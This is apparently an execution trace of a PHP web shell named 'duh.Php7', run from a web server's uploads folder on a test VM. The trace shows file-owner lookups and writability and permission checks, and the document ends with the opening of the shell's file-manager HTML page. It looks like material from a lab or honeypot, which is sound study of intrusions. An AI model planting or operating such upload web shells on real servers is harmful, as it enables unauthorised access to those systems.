2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003482 493832 filegroup 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 70 1 0.003499 493872
2 70 R 0
2 71 0 0.003511 493832 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 71 1 0.003534 494488
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php7 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.003568 494520 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 72 1 0.003581 494600
2 72 R '/var/www/html/uploads'
2 73 0 0.003596 494616 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 73 1 0.003609 494696
2 73 R '/var/www/html/uploads'
2 74 0 0.003623 494680 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 74 1 0.003636 494760
2 74 R '/var/www/html/uploads'
2 75 0 0.003651 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 75 1 0.003663 495176
2 75 R '/var/www/html/uploads'
2 76 0 0.003676 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 76 1 0.003688 495176
2 76 R '/var/www/html/uploads'
2 77 0 0.003702 495352 get_color 1 /var/www/html/uploads/duh.Php7 41 1 '.'
3 78 0 0.003715 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.'
3 78 1 0.003731 495392
3 78 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = '#ccff00'
3 79 0 0.003764 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.'
3 79 1 0.003779 495392
3 79 R TRUE
3 80 0 0.003792 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.'
3 80 1 0.003805 495392
3 80 R TRUE
2 77 1 0.003818 495352
2 77 R '#ccff00'
2 81 0 0.003831 495352 perms 1 /var/www/html/uploads/duh.Php7 41 1 '.'
3 82 0 0.003842 495352 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '.'
3 82 1 0.003856 495392
3 82 R TRUE
3 83 0 0.003868 495352 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '.'
3 83 1 0.003880 495392
3 83 R 16895
3 84 0 0.003892 495352 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 84 1 0.003905 495736
3 84 R '40777'
3 85 0 0.003918 495672 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 85 1 0.003931 495768
3 85 R '0777'
2 81 1 0.003943 495384
2 81 R '0777'
2 86 0 0.003956 495480 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 86 1 0.003969 495560
2 86 R '/var/www/html/uploads'
2 87 0 0.003983 495480 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 87 1 0.003996 495560
2 87 R '/var/www/html/uploads'
2 88 0 0.004010 495736 perms 1 /var/www/html/uploads/duh.Php7 41 1 '.'
3 89 0 0.004021 495736 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '.'
3 89 1 0.004035 495776
3 89 R TRUE
3 90 0 0.004048 495736 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '.'
3 90 1 0.004059 495776
3 90 R 16895
3 91 0 0.004071 495736 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 91 1 0.004083 496120
3 91 R '40777'
3 92 0 0.004096 496056 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 92 1 0.004108 496152
3 92 R '0777'
2 88 1 0.004120 495768
2 88 R '0777'
1 A /var/www/html/uploads/duh.Php7 41 $i++
2 93 0 0.004144 494456 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getpwuid'
2 93 1 0.004157 494496
2 93 R TRUE
2 94 0 0.004169 494456 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getgrgid'
2 94 1 0.004182 494496
2 94 R TRUE
2 95 0 0.004194 494456 fileowner 0 /var/www/html/uploads/duh.Php7 41 1 '..'
2 95 1 0.004208 494496
2 95 R 0
2 96 0 0.004220 494456 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 96 1 0.004242 495256
2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004282 494456 filegroup 0 /var/www/html/uploads/duh.Php7 41 1 '..'
2 97 1 0.004299 494496
2 97 R 0
2 98 0 0.004311 494456 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 98 1 0.004332 495112
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php7 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004366 494520 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '..'
2 99 1 0.004379 494592
2 99 R '/var/www/html'
2 100 0 0.004393 494616 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 100 1 0.004406 494696
2 100 R '/var/www/html/uploads'
2 101 0 0.004421 494680 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 101 1 0.004434 494760
2 101 R '/var/www/html/uploads'
2 102 0 0.004448 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 102 1 0.004461 495176
2 102 R '/var/www/html/uploads'
2 103 0 0.004474 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '..'
2 103 1 0.004487 495168
2 103 R '/var/www/html'
2 104 0 0.004502 495352 get_color 1 /var/www/html/uploads/duh.Php7 41 1 '..'
3 105 0 0.004514 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '..'
3 105 1 0.004528 495392
3 105 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = '#ccff00'
3 106 0 0.004551 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '..'
3 106 1 0.004565 495392
3 106 R TRUE
3 107 0 0.004578 495352 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '..'
3 107 1 0.004591 495392
3 107 R TRUE
2 104 1 0.004604 495352
2 104 R '#ccff00'
2 108 0 0.004617 495352 perms 1 /var/www/html/uploads/duh.Php7 41 1 '..'
3 109 0 0.004629 495352 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '..'
3 109 1 0.004643 495392
3 109 R TRUE
3 110 0 0.004655 495352 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '..'
3 110 1 0.004667 495392
3 110 R 16895
3 111 0 0.004679 495352 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 111 1 0.004692 495736
3 111 R '40777'
3 112 0 0.004705 495672 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 112 1 0.004717 495768
3 112 R '0777'
2 108 1 0.004730 495384
2 108 R '0777'
2 113 0 0.004743 495480 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 113 1 0.004756 495560
2 113 R '/var/www/html/uploads'
2 114 0 0.004770 495480 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '..'
2 114 1 0.004782 495552
2 114 R '/var/www/html'
2 115 0 0.004796 495736 perms 1 /var/www/html/uploads/duh.Php7 41 1 '..'
3 116 0 0.004807 495736 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '..'
3 116 1 0.004821 495776
3 116 R TRUE
3 117 0 0.004834 495736 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '..'
3 117 1 0.004846 495776
3 117 R 16895
3 118 0 0.004858 495736 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 118 1 0.004871 496120
3 118 R '40777'
3 119 0 0.004884 496056 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 119 1 0.004896 496152
3 119 R '0777'
2 115 1 0.004909 495768
2 115 R '0777'
1 A /var/www/html/uploads/duh.Php7 41 $i++
2 120 0 0.004932 494456 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getpwuid'
2 120 1 0.004946 494496
2 120 R TRUE
2 121 0 0.004958 494456 function_exists 0 /var/www/html/uploads/duh.Php7 41 1 'posix_getgrgid'
2 121 1 0.004971 494496
2 121 R TRUE
2 122 0 0.004983 494456 fileowner 0 /var/www/html/uploads/duh.Php7 41 1 'data'
2 122 1 0.004997 494496
2 122 R 0
2 123 0 0.005009 494456 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 123 1 0.005030 495256
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005075 494456 filegroup 0 /var/www/html/uploads/duh.Php7 41 1 'data'
2 124 1 0.005087 494496
2 124 R 0
2 125 0 0.005100 494456 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 41 1 0
2 125 1 0.005121 495112
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php7 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005155 494536 realpath 0 /var/www/html/uploads/duh.Php7 41 1 'data'
2 126 1 0.005170 494624
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005185 494648 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 127 1 0.005198 494728
2 127 R '/var/www/html/uploads'
2 128 0 0.005212 494712 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 128 1 0.005224 494792
2 128 R '/var/www/html/uploads'
2 129 0 0.005238 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 129 1 0.005251 495176
2 129 R '/var/www/html/uploads'
2 130 0 0.005264 495096 realpath 0 /var/www/html/uploads/duh.Php7 41 1 'data'
2 130 1 0.005277 495184
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005292 495480 get_color 1 /var/www/html/uploads/duh.Php7 41 1 'data'
3 132 0 0.005304 495480 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'data'
3 132 1 0.005318 495520
3 132 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = '#ccff00'
3 133 0 0.005341 495480 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'data'
3 133 1 0.005355 495520
3 133 R TRUE
3 134 0 0.005368 495480 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'data'
3 134 1 0.005382 495520
3 134 R TRUE
2 131 1 0.005394 495480
2 131 R '#ccff00'
2 135 0 0.005407 495480 perms 1 /var/www/html/uploads/duh.Php7 41 1 'data'
3 136 0 0.005419 495480 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'data'
3 136 1 0.005433 495520
3 136 R TRUE
3 137 0 0.005445 495480 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'data'
3 137 1 0.005458 495520
3 137 R 16895
3 138 0 0.005470 495480 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 138 1 0.005483 495864
3 138 R '40777'
3 139 0 0.005496 495800 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 139 1 0.005508 495896
3 139 R '0777'
2 135 1 0.005521 495512
2 135 R '0777'
2 140 0 0.005534 495480 realpath 0 /var/www/html/uploads/duh.Php7 41 1 '.'
2 140 1 0.005546 495560
2 140 R '/var/www/html/uploads'
2 141 0 0.005561 495736 realpath 0 /var/www/html/uploads/duh.Php7 41 1 'data'
2 141 1 0.005574 495824
2 141 R '/var/www/html/uploads/data'
2 142 0 0.005588 495736 perms 1 /var/www/html/uploads/duh.Php7 41 1 'data'
3 143 0 0.005600 495736 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'data'
3 143 1 0.005614 495776
3 143 R TRUE
3 144 0 0.005626 495736 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'data'
3 144 1 0.005638 495776
3 144 R 16895
3 145 0 0.005651 495736 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 16895
3 145 1 0.005663 496120
3 145 R '40777'
3 146 0 0.005676 496056 substr 0 /var/www/html/uploads/duh.Php7 57 2 '40777' -4
3 146 1 0.005688 496152
3 146 R '0777'
2 142 1 0.005701 495768
2 142 R '0777'
1 A /var/www/html/uploads/duh.Php7 41 $i++
2 147 0 0.005876 494456 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getpwuid'
2 147 1 0.005890 494496
2 147 R TRUE
2 148 0 0.005903 494456 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getgrgid'
2 148 1 0.005920 494496
2 148 R TRUE
2 149 0 0.005932 494456 fileowner 0 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
2 149 1 0.005973 494504
2 149 R 0
2 150 0 0.006067 494464 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 42 1 0
2 150 1 0.006094 495264
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006141 494464 filegroup 0 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
2 151 1 0.006154 494504
2 151 R 0
2 152 0 0.006166 494464 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 42 1 0
2 152 1 0.006188 495120
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php7 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006222 494544 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 153 1 0.006236 494624
2 153 R '/var/www/html/uploads'
2 154 0 0.006252 494656 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 154 1 0.006265 494736
2 154 R '/var/www/html/uploads'
2 155 0 0.006279 494720 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 155 1 0.006291 494800
2 155 R '/var/www/html/uploads'
2 156 0 0.006305 495104 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 156 1 0.006318 495184
2 156 R '/var/www/html/uploads'
2 157 0 0.006332 495232 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
2 157 1 0.006347 495320
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006363 495488 get_color 1 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
3 159 0 0.006376 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.htaccess'
3 159 1 0.006392 495528
3 159 R FALSE
3 160 0 0.006405 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.htaccess'
3 160 1 0.006420 495528
3 160 R FALSE
3 161 0 0.006433 495488 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 '.htaccess'
3 161 1 0.006447 495528
3 161 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = ''
3 162 0 0.006472 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 '.htaccess'
3 162 1 0.006487 495528
3 162 R FALSE
3 163 0 0.006499 495488 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 '.htaccess'
3 163 1 0.006513 495528
3 163 R TRUE
2 158 1 0.006526 495488
2 158 R ''
2 164 0 0.006538 495488 perms 1 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
3 165 0 0.006551 495488 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '.htaccess'
3 165 1 0.006565 495528
3 165 R TRUE
3 166 0 0.006578 495488 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '.htaccess'
3 166 1 0.006590 495528
3 166 R 33188
3 167 0 0.006603 495488 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33188
3 167 1 0.006616 495872
3 167 R '100644'
3 168 0 0.006629 495808 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100644' -4
3 168 1 0.006642 495904
3 168 R '0644'
2 164 1 0.006654 495520
2 164 R '0644'
2 169 0 0.006667 495744 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 169 1 0.006680 495824
2 169 R '/var/www/html/uploads'
2 170 0 0.006695 495744 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
2 170 1 0.006708 495832
2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.006723 495744 perms 1 /var/www/html/uploads/duh.Php7 42 1 '.htaccess'
3 172 0 0.006735 495744 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 '.htaccess'
3 172 1 0.006749 495784
3 172 R TRUE
3 173 0 0.006762 495744 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 '.htaccess'
3 173 1 0.006774 495784
3 173 R 33188
3 174 0 0.006786 495744 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33188
3 174 1 0.006799 496128
3 174 R '100644'
3 175 0 0.006811 496064 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100644' -4
3 175 1 0.006824 496160
3 175 R '0644'
2 171 1 0.006837 495776
2 171 R '0644'
2 176 0 0.006851 494464 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getpwuid'
2 176 1 0.006864 494504
2 176 R TRUE
2 177 0 0.006877 494464 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getgrgid'
2 177 1 0.006894 494504
2 177 R TRUE
2 178 0 0.006907 494464 fileowner 0 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
2 178 1 0.006921 494504
2 178 R 1000
2 179 0 0.006933 494464 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 42 1 1000
2 179 1 0.006963 495280
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.007006 494480 filegroup 0 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
2 180 1 0.007026 494520
2 180 R 1000
2 181 0 0.007038 494480 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 42 1 1000
2 181 1 0.007070 495136
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/duh.Php7 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.007104 494560 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 182 1 0.007118 494640
2 182 R '/var/www/html/uploads'
2 183 0 0.007133 494672 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 183 1 0.007146 494752
2 183 R '/var/www/html/uploads'
2 184 0 0.007160 494736 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 184 1 0.007173 494816
2 184 R '/var/www/html/uploads'
2 185 0 0.007187 495120 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 185 1 0.007200 495200
2 185 R '/var/www/html/uploads'
2 186 0 0.007214 495248 realpath 0 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
2 186 1 0.007227 495336
2 186 R '/var/www/html/uploads/duh.Php7'
2 187 0 0.007243 495504 get_color 1 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
3 188 0 0.007254 495504 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'duh.Php7'
3 188 1 0.007269 495544
3 188 R FALSE
3 189 0 0.007282 495504 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'duh.Php7'
3 189 1 0.007295 495544
3 189 R FALSE
3 190 0 0.007308 495504 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 'duh.Php7'
3 190 1 0.007322 495544
3 190 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = ''
3 191 0 0.007346 495504 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'duh.Php7'
3 191 1 0.007359 495544
3 191 R FALSE
3 192 0 0.007372 495504 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 'duh.Php7'
3 192 1 0.007385 495544
3 192 R TRUE
2 187 1 0.007398 495504
2 187 R ''
2 193 0 0.007410 495504 perms 1 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
3 194 0 0.007422 495504 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'duh.Php7'
3 194 1 0.007435 495544
3 194 R TRUE
3 195 0 0.007447 495504 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'duh.Php7'
3 195 1 0.007459 495544
3 195 R 33204
3 196 0 0.007472 495504 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33204
3 196 1 0.007485 495888
3 196 R '100664'
3 197 0 0.007498 495824 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100664' -4
3 197 1 0.007510 495920
3 197 R '0664'
2 193 1 0.007523 495536
2 193 R '0664'
2 198 0 0.007536 495760 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 198 1 0.007549 495840
2 198 R '/var/www/html/uploads'
2 199 0 0.007564 495760 realpath 0 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
2 199 1 0.007576 495848
2 199 R '/var/www/html/uploads/duh.Php7'
2 200 0 0.007591 495760 perms 1 /var/www/html/uploads/duh.Php7 42 1 'duh.Php7'
3 201 0 0.007602 495760 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'duh.Php7'
3 201 1 0.007616 495800
3 201 R TRUE
3 202 0 0.007629 495760 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'duh.Php7'
3 202 1 0.007640 495800
3 202 R 33204
3 203 0 0.007653 495760 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33204
3 203 1 0.007666 496144
3 203 R '100664'
3 204 0 0.007682 496080 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100664' -4
3 204 1 0.007694 496176
3 204 R '0664'
2 200 1 0.007707 495792
2 200 R '0664'
2 205 0 0.007721 494480 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getpwuid'
2 205 1 0.007734 494520
2 205 R TRUE
2 206 0 0.007746 494480 function_exists 0 /var/www/html/uploads/duh.Php7 42 1 'posix_getgrgid'
2 206 1 0.007759 494520
2 206 R TRUE
2 207 0 0.007772 494480 fileowner 0 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
2 207 1 0.007787 494520
2 207 R 0
2 208 0 0.007799 494480 posix_getpwuid 0 /var/www/html/uploads/duh.Php7 42 1 0
2 208 1 0.007821 495280
2 208 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.Php7 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 209 0 0.007861 494464 filegroup 0 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
2 209 1 0.007874 494504
2 209 R 0
2 210 0 0.007886 494464 posix_getgrgid 0 /var/www/html/uploads/duh.Php7 42 1 0
2 210 1 0.007907 495120
2 210 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.Php7 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 211 0 0.007941 494544 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 211 1 0.007954 494624
2 211 R '/var/www/html/uploads'
2 212 0 0.007969 494688 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 212 1 0.007982 494768
2 212 R '/var/www/html/uploads'
2 213 0 0.007996 494784 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 213 1 0.008009 494864
2 213 R '/var/www/html/uploads'
2 214 0 0.008024 495104 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 214 1 0.008036 495184
2 214 R '/var/www/html/uploads'
2 215 0 0.008050 495232 realpath 0 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
2 215 1 0.008064 495328
2 215 R '/var/www/html/uploads/prepend.php'
2 216 0 0.008079 495488 get_color 1 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
3 217 0 0.008092 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'prepend.php'
3 217 1 0.008107 495528
3 217 R FALSE
3 218 0 0.008120 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'prepend.php'
3 218 1 0.008134 495528
3 218 R FALSE
3 219 0 0.008147 495488 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 'prepend.php'
3 219 1 0.008160 495528
3 219 R TRUE
2 A /var/www/html/uploads/duh.Php7 56 $c = ''
3 220 0 0.008184 495488 is_writable 0 /var/www/html/uploads/duh.Php7 56 1 'prepend.php'
3 220 1 0.008199 495528
3 220 R FALSE
3 221 0 0.008211 495488 is_readable 0 /var/www/html/uploads/duh.Php7 56 1 'prepend.php'
3 221 1 0.008225 495528
3 221 R TRUE
2 216 1 0.008238 495488
2 216 R ''
2 222 0 0.008251 495488 perms 1 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
3 223 0 0.008263 495488 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'prepend.php'
3 223 1 0.008277 495528
3 223 R TRUE
3 224 0 0.008290 495488 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'prepend.php'
3 224 1 0.008303 495528
3 224 R 33261
3 225 0 0.008315 495488 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33261
3 225 1 0.008328 495872
3 225 R '100755'
3 226 0 0.008341 495808 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100755' -4
3 226 1 0.008354 495904
3 226 R '0755'
2 222 1 0.008366 495520
2 222 R '0755'
2 227 0 0.008379 495744 realpath 0 /var/www/html/uploads/duh.Php7 42 1 '.'
2 227 1 0.008392 495824
2 227 R '/var/www/html/uploads'
2 228 0 0.008406 495744 realpath 0 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
2 228 1 0.008419 495840
2 228 R '/var/www/html/uploads/prepend.php'
2 229 0 0.008434 495744 perms 1 /var/www/html/uploads/duh.Php7 42 1 'prepend.php'
3 230 0 0.008450 495744 file_exists 0 /var/www/html/uploads/duh.Php7 57 1 'prepend.php'
3 230 1 0.008465 495784
3 230 R TRUE
3 231 0 0.008478 495744 fileperms 0 /var/www/html/uploads/duh.Php7 57 1 'prepend.php'
3 231 1 0.008491 495784
3 231 R 33261
3 232 0 0.008503 495744 sprintf 0 /var/www/html/uploads/duh.Php7 57 2 '%o' 33261
3 232 1 0.008517 496128
3 232 R '100755'
3 233 0 0.008529 496064 substr 0 /var/www/html/uploads/duh.Php7 57 2 '100755' -4
3 233 1 0.008542 496160
3 233 R '0755'
2 229 1 0.008555 495776
2 229 R '0755'
1 3 1 0.008576 494464
0.008627 347184
TRACE END [2023-02-13 01:16:14.470435]
<html><head><title>localhost </title><style>body {background:#333333;color:#999999;font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:#999999;text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:#999999;color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:#333333;box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:#333333;border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:#333333;border-radius:10px;border:1px solid #999999;color:#999999;text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:#999999;box-shadow:0px 0px 1px #999999;border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid #999999;padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:#333333;color:#999999;box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById('moreI').style.display=="block"){document.getElementById('moreI').style.display="none"}else 